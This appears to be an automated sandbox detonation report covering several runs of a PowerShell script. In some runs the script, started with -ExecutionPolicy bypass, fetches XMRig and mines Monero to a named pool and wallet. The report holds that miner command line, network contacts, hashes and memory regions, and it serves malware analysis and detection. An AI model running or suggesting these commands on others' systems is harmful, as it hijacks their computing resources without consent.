"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ah0edcim.mus.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral25

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:45

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4356,i,4686244434963378549,11462511444150484980,262144 --variations-seed-version --mojo-platform-channel-handle=3656 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1748,i,4686244434963378549,11462511444150484980,262144 --variations-seed-version --mojo-platform-channel-handle=3212 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
NL 52.142.223.178:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_40qnqvo4.kv5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral27

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:48

Platform

win10v2004-20240508-en

Max time kernel

1554s

Max time network

1563s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xj44tu10.l4x.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:18

Platform

win10-20240404-en

Max time kernel

1793s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uhgguzv4.5ar.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3


memory/4016-153-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-154-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-155-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-156-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-157-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:23

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1778s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

memory/404-3-0x00007FFE770D3000-0x00007FFE770D4000-memory.dmp

memory/404-5-0x00000225A3C60000-0x00000225A3C82000-memory.dmp

memory/404-6-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp

memory/404-10-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp

memory/404-9-0x00000225A3E10000-0x00000225A3E86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mi4ygcu2.fzs.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/404-26-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp

memory/404-49-0x00000225A3DE0000-0x00000225A3DF2000-memory.dmp

memory/404-62-0x00000225A3DB0000-0x00000225A3DBA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2528-91-0x000001F716CF0000-0x000001F716D10000-memory.dmp

memory/2528-92-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/404-93-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp

memory/404-95-0x00007FFE770D3000-0x00007FFE770D4000-memory.dmp

memory/2528-94-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/404-96-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp

memory/2528-97-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-98-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-99-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-100-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-101-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-102-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-103-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-104-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-105-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-106-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-107-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-108-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-109-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-110-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-111-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-112-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-113-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-114-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-115-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-116-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-117-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-118-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-119-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-120-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-121-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-122-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-123-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-124-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-125-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-126-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-127-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-128-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-129-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-130-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-131-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-132-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-133-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-134-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-135-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-136-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-137-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-138-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-139-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-140-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-141-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-142-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-143-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-144-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-145-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-146-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-147-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-148-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-149-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-150-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-151-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-152-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-153-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-154-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-155-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-156-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-157-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:24

Platform

win7-20240221-en

Max time kernel

1556s

Max time network

1561s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Network

N/A

Files

memory/1664-4-0x000007FEF5F5E000-0x000007FEF5F5F000-memory.dmp

memory/1664-5-0x000000001B3B0000-0x000000001B692000-memory.dmp

memory/1664-6-0x0000000002310000-0x0000000002318000-memory.dmp

memory/1664-7-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

memory/1664-8-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

memory/1664-9-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

memory/1664-10-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

memory/1664-11-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

memory/1664-12-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:41

Platform

win10v2004-20240508-en

Max time kernel

1662s

Max time network

1671s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 52.111.227.14:443 tcp

Files

memory/4220-0-0x00007FFB278C3000-0x00007FFB278C5000-memory.dmp

memory/4220-1-0x0000018758790000-0x00000187587B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m2a55eua.0b5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4220-11-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp

memory/4220-12-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp

memory/4220-13-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp

memory/4220-14-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp

memory/4220-15-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp

memory/4220-16-0x00007FFB278C3000-0x00007FFB278C5000-memory.dmp

memory/4220-17-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp

memory/4220-18-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:48

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
